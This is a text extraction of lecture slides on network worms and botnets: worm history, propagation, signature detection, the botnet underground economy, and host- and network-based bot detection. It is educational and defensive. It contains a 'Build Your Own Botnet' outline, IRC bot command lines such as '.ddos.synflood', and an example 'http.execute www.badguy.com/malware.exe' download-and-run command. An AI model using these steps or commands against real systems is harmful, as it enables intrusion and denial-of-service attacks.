* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project
Download c - Mehran UET Scholars
Survey
Document related concepts
TCP congestion control wikipedia , lookup
Computer network wikipedia , lookup
Deep packet inspection wikipedia , lookup
Recursive InterNetwork Architecture (RINA) wikipedia , lookup
Wake-on-LAN wikipedia , lookup
Piggybacking (Internet access) wikipedia , lookup
Network tap wikipedia , lookup
Remote Desktop Services wikipedia , lookup
Airborne Networking wikipedia , lookup
List of wireless community networks by region wikipedia , lookup
Storm botnet wikipedia , lookup
Distributed firewall wikipedia , lookup
Transcript
Network Worms and Bots Outline Worms Worm examples and propagation methods Detection methods Traffic patterns: EarlyBird Vulnerabilities: Generic Exploit Blocking Disabling worms Generate signatures for network or host-based filters Bots Structure and use of bots Recognizing bot propagation Recognizing bot operation Network-based methods Host-based methods 2 Worm A worm is self-replicating software designed to spread through the network Typically, exploit security flaws in widely used services Can cause enormous damage Launch DDOS attacks, install bot networks Access sensitive information Cause confusion by corrupting the sensitive information Worm vs Virus vs Trojan horse 3 A virus is code embedded in a file or program Viruses and Trojan horses rely on human intervention Worms are self-contained and may spread autonomously Cost of worm attacks Morris worm, 1988 Infected approximately 6,000 machines 10% of computers connected to the Internet cost ~ $10 million in downtime and cleanup Code Red worm, July 16 2001 Direct descendant of Morris’ worm Infected more than 500,000 servers Programmed to go into infinite sleep mode July 28 Caused ~ $2.6 Billion in damages, Love Bug worm: $8.75 billion 4 Statistics: Computer Economics Inc., Carlsbad, California Internet Worm (First major attack) Released November 1988 Program spread through Digital, Sun workstations Exploited Unix security vulnerabilities VAX computers and SUN-3 workstations running versions 4.2 and 4.3 Berkeley UNIX code Consequences No immediate damage from program itself Replication and threat of damage Load on network, systems used in attack Many systems shut down to prevent further attack 5 Some historical worms of note 6 Worm Date Distinction Morris 11/88 Used multiple vulnerabilities, propagate to “nearby” sys ADM 5/98 Random scanning of IP address space Ramen 1/01 Exploited three vulnerabilities Lion 3/01 Stealthy, rootkit worm Cheese 6/01 Vigilante worm that secured vulnerable systems Code Red 7/01 First sig Windows worm; Completely memory resident Walk 8/01 Recompiled source code locally Nimda 9/01 Windows worm: client-to-server, c-to-c, s-to-s, … Scalper 6/02 11 days after announcement of vulnerability; peer-topeer network of compromised systems Slammer 1/03 Used a single UDP packet for explosive growth Kienzle and Elder Increasing propagation speed Code Red, July 2001 Affects Microsoft Index Server 2.0, Windows 2000 Indexing service on Windows NT 4.0. Windows 2000 that run IIS 4.0 and 5.0 Web servers Exploits known buffer overflow in Idq.dll Vulnerable population (360,000 servers) infected in 14 hours SQL Slammer, January 2003 Affects in Microsoft SQL 2000 Exploits known buffer overflow vulnerability Server Resolution service vulnerability reported June 2002 Patched released in July 2002 Bulletin MS02-39 7 Vulnerable population infected in less than 10 minutes Code Red Initial version released July 13, 2001 Sends its code as an HTTP request HTTP request exploits buffer overflow Malicious code is not stored in a file Placed in memory and then run When executed, Worm checks for the file C:\Notworm If file exists, the worm thread goes into infinite sleep state Creates new threads If the date is before the 20th of the month, the next 99 threads attempt to exploit more computers by targeting random IP addresses 8 Code Red of July 13 and July 19 Initial release of July 13 1st through 20th month: Spread via random scan of 32-bit IP addr space 20th through end of each month: attack. Flooding attack against 198.137.240.91 (www.whitehouse.gov) Failure to seed random number generator linear growth Revision released July 19, 2001. 9 White House responds to threat of flooding attack by changing the address of www.whitehouse.gov Causes Code Red to die for date ≥ 20th of the month. But: this time random number generator correctly seeded Slides: Vern Paxson Code Red 2 Released August 4, 2001. Comment in code: “Code Red 2.” But in fact completely different code base. Payload: a root backdoor, resilient to reboots. Bug: crashes NT, only works on Windows 2000. Localized scanning: prefers nearby addresses. Kills Code Red 1. Safety valve: programmed to die Oct 1, 2001. 10 Slides: Vern Paxson Striving for Greater Virulence: Nimda Released September 18, 2001. Multi-mode spreading: attack IIS servers via infected clients email itself to address book as a virus copy itself across open network shares modifying Web pages on infected servers w/ client exploit scanning for Code Red II backdoors (!) worms form an ecosystem! Leaped across firewalls. 11 Slides: Vern Paxson Code Red 2 kills off Code Red 1 CR 1 returns thanks to bad clocks 12 Nimda enters the ecosystem Code Red 2 settles into weekly pattern Code Red 2 dies off as programmed Slides: Vern Paxson How do worms propagate? Scanning worms Worm chooses “random” address Coordinated scanning Different worm instances scan different addresses Flash worms Assemble tree of vulnerable hosts in advance, propagate along tree Not observed in the wild, yet Potential for 106 hosts in < 2 sec ! [Staniford] Meta-server worm Ask server for hosts to infect (e.g., Google for “powered by phpbb”) Topological worm: Use information from infected hosts (web server logs, email address books, config files, SSH “known hosts”) Contagion worm 13 Propagate parasitically along with normally initiated communication Worm Detection and Defense Detect via honeyfarms: collections of “honeypots” Any outbound connection from honeyfarm = worm. (at least, that’s the theory) Distill signature from inbound/outbound traffic. If honeypot covers N addresses, expect detection when worm has infected 1/N of population. Thwart via scan suppressors: network elements that block traffic from hosts that make failed connection attempts to too many other hosts 14 5 minutes to several weeks to write a signature Several hours or more for testing Signature inference Monitor network and look for strings common to traffic with worm-like behavior 15 Signatures can then be used for content filtering Slide: S Savage Content sifting Assume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm (true today, not tomorrow...) Two consequences Content Prevalence: W will be more common in traffic than other bitstrings of the same length Address Dispersion: the set of packets containing W will address a disproportionate number of distinct sources and destinations Content sifting: find W’s with high content prevalence and high address dispersion and drop that traffic 16 Slide: S Savage The basic algorithm Detector in network A B C cnn.com E Prevalence Table 17 (Stefan Savage, UCSD *) D Address Dispersion Table Sources Destinations The basic algorithm Detector in network A B C cnn.com E D Prevalence Table 1 18 (Stefan Savage, UCSD *) Address Dispersion Table Sources Destinations 1 (A) 1 (B) The basic algorithm Detector in network A B C cnn.com E D Prevalence Table 19 (Stefan Savage, UCSD *) 1 1 Address Dispersion Table Sources Destinations 1 (A) 1 (C) 1 (B) 1 (A) The basic algorithm Detector in network A B C cnn.com E D Prevalence Table 20 (Stefan Savage, UCSD *) 2 1 Address Dispersion Table Sources Destinations 2 (A,B) 1 (C) 2 (B,D) 1 (A) The basic algorithm Detector in network A B C cnn.com E D Prevalence Table 21 (Stefan Savage, UCSD *) 3 1 Address Dispersion Table Sources Destinations 3 (A,B,D) 3 (B,D,E) 1 (C) 1 (A) Challenges Computation To support a 1Gbps line rate we have 12us to process each packet, at 10Gbps 1.2us, at 40Gbps… Dominated by memory references; state expensive Content sifting requires looking at every byte in a packet State On a fully-loaded 1Gbps link a naïve implementation can easily consume 100MB/sec for table Computation/memory duality: on high-speed (ASIC) implementation, latency requirements may limit state to on-chip SRAM 22 (Stefan Savage, UCSD *) Worm summary Worm attacks Many ways for worms to propagate Propagation time is increasing Polymorphic worms, other barriers to detection Detect Traffic patterns: EarlyBird Watch attack: TaintCheck and Sting Look at vulnerabilities: Generic Exploit Blocking Disable 23 Generate worm signatures and use in network or host-based filters Botnet Collection of compromised hosts Spread like worms and viruses Once installed, respond to remote commands Platform for many attacks Spam forwarding (70% of all spam?) Click fraud Keystroke logging Distributed denial of service attacks Serious problem 24 Top concern of banks, online merchants Vint Cerf: ¼ of hosts connected to Internet What are botnets used for? capability ago DSNX create port redirect √ other proxy √ download file from web √ DNS resolution √ UDP/ping floods √ other DDoS floods √ scan/spread √ spam √ visit URL √ evil G-SyS sd Spy √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ Capabilities are exercised via remote commands. 25 √ Building a Bot Network compromise attempt Attacker compromise attempt compromise attempt compromise attempt 26 Win XP FreeBSD Mac OS X Win XP Building a Bot Network compromise attempt install bot software Attacker compromise attempt compromise attempt compromise attempt install bot software 27 Win XP compromised FreeBSD Mac OS X Win XP compromised Step 2 Win XP Win XP Win XP . . . . . . . . . /connect jade.va.us.dal.net /connect jade.va.us.dal.net /connect jade.va.us.dal.net /join #hacker /join #hacker /join #hacker . . . . . . . . . jade.va.dal.net 28 Step 3 (12:59:27pm) -- A9-pcgbdv ([email protected]) has joined (#owned) Users : 1646 (12:59:27pm) (@PhaTTy) .ddos.synflood 216.209.82.62 (12:59:27pm) -- A6-bpxufrd ([email protected]) has joined (#owned) Users : 1647 (12:59:27pm) -- A9-nzmpah ([email protected]) has left IRC (Connection reset by peer) (12:59:28pm) (@PhaTTy) .scan.enable DCOM (12:59:28pm) -- A9-tzrkeasv ([email protected]) has joined (#owned) Users : 1650 29 • • • • • 30 Spam service Rent-a-bot Cash-out Pump and dump Botnet rental Underground commerce Market in access to bots Botherd: Collects and manages bots Access to proxies (“peas”) sold to spammers, often with commercial-looking web interface Sample rates Non-exclusive access to botnet: 10¢ per machine Exclusive access: 25¢. Payment via compromised account (eg PayPal) or cash to dropbox Identity Theft Keystroke logging Complete identities available for $25 - $200+ Rates depend on financial situation of compromised person Include all info from PC files, plus all websites of interest with passwords/account info used by PC owner At $200+, usually includes full credit report 31 [Lloyd Taylor, Keynote Systems, SFBay InfraGard Board ] Sobig.a In Action Arrives as an email attachment Written in C++ Encrypted with Telock to slow analysis User opens attachment, launching trojan Downloads file from a free Geocities account Contains list of URLs pointing to second stage Fetches second-stage trojan 32 Arbitrary executable file – could be anything For Sobig.a, second-stage trojan is Lala Stage 2 – Lala Communication Lala notifies a cgi script on a compromised host Different versions of Lala have different sites and cgi scripts, perhaps indicating tracking by author Installation Lala installs a keylogger and password-protected Lithium remote access trojan. Lala downloads Stage 3 trojan Wingate proxy (commercial software) Cleanup 33 Lala removes the Sobig.a trojan Stage 3 – Wingate Wingate is a general-purpose port proxy server 555/TCP – RTSP Service 1180/TCP – SOCKS 1182/TCP – WWW Proxy 1184/TCP – POP3 Proxy 608/TCP – Remote Control 1181/TCP – Telnet Proxy 1183/TCP – FTP Proxy 1185/TCP – SMTP Server Final state of compromised machine Complete remote control by Lithium client with password “adm123” Complete logging of user’s keystrokes Usable for spam relay, http redirects Wingate Gatekeeper client can connect to 608/TCP, can log/change everything 34 Build Your Own Botnet Pick a vector mechanism IRC Channels: DCC Filesends, Website Adverts to Exploit Sites Scan & Sploit: MSBlast Trojan: SoBig/BugBear/ActiveX Exploits Choose a Payload Backdoors Do it Agobot, SubSeven, DeepThroat Most include mechanisms for DDoS, Self-spreading, download/exec arbitrary code, password stealers. Compromise an IRC server, or use your own zombied machines Configure Payload to connect to selected server Load encryption keys and codes Release through appropriate compromised systems Sit back and wait, or start on your next Botnet [Lloyd Taylor, Keynote Systems, SFBay InfraGard Board ] 35 Bot detection methods Signature-based (most AV products) Rule-based Monitor outbound network connections (e.g. ZoneAlarm, BINDER) Block certain ports (25, 6667, ...) Hybrid: content-based filtering Match network packet contents to known command strings (keywords) E.g. Gaobot ddos cmds: .ddos.httpflood Network traffic monitoring Wenke Lee, Phil Porras: Bot Hunter, … Correlate various NIDS alarms to identify “bot infection sequence” GA Tech: Recognize traffic patterns associated with ddns-based rallying Stuart Staniford, FireEye Detect port scanning to identify suspicious traffic Emulate host with taint tracking to identify exploit 36 Introduction Approaches to Privacy-Preserving Correlation A Cyber-TA Distributed Correlation Example – botHunter What is botHunter? A Real Case Study Behavior-based Correlation Architectural Overview BotHunter: passive What is botHunter? botHunter Sensors Correlation Framework Example botHunter Output Cyber-TA Integration bot detection Snort-based sensor suite for malware event detection inbound scan detection remote to local exploit detection anomaly detection system for exploits over key TCP protocols Botnet specific egg download banners, Victim-to-C&C-based communications exchanges particularly for IRC bot protocols Event correlator 37 combines information from sensors to recognize bots that infect and coordinate with your internal network assets Submits “bot-detection profiles” to the Cyber-TA repository infrastructure Botnets network traffic patterns Unique characteristic: “rallying” Bots spread like worms and trojans Payloads may be common backdoors Centralized control of botnet is characteristic feature Georgia Tech idea: DNS Bots installed at network edge IP addresses may vary, use Dynamic DNS Bots talk to controller, make DDNS lookup Pattern of DDNS lookup is easy to spot for common botnets! David Dagon, Sanjeev Dwivedi, Robert Edmonds, Julian Grizzard, Wenke Lee, Richard Lipton, Merrick Furst; Cliff Zou (U Mass) 38 BotSwat Host-based bot detection Based on idea of remote control commands 39 What does remote control look like? http.execute <URL> <local_path> Invoke system calls: connect, network send and recv, create file, write file, … On arguments received over the network: IP to connect to, object to request, file name, … Botswat premise 40 We can distinguish the behavior of bots from that of innocuous processes via detecting “remote control” We can approximate “remote control” as “using data received over the network in a system call argument” http.execute www.badguy.com/malware.exe C:\WIN\bad.exe agobot 1 3 4 connect(…,www.badguy.com,…) 5 send( …,“…GET /malware.exe…”,…) 7 fcreate(…,“C:\WIN\malware.exe”,…) 8 2 Windows XP 41 NIC 6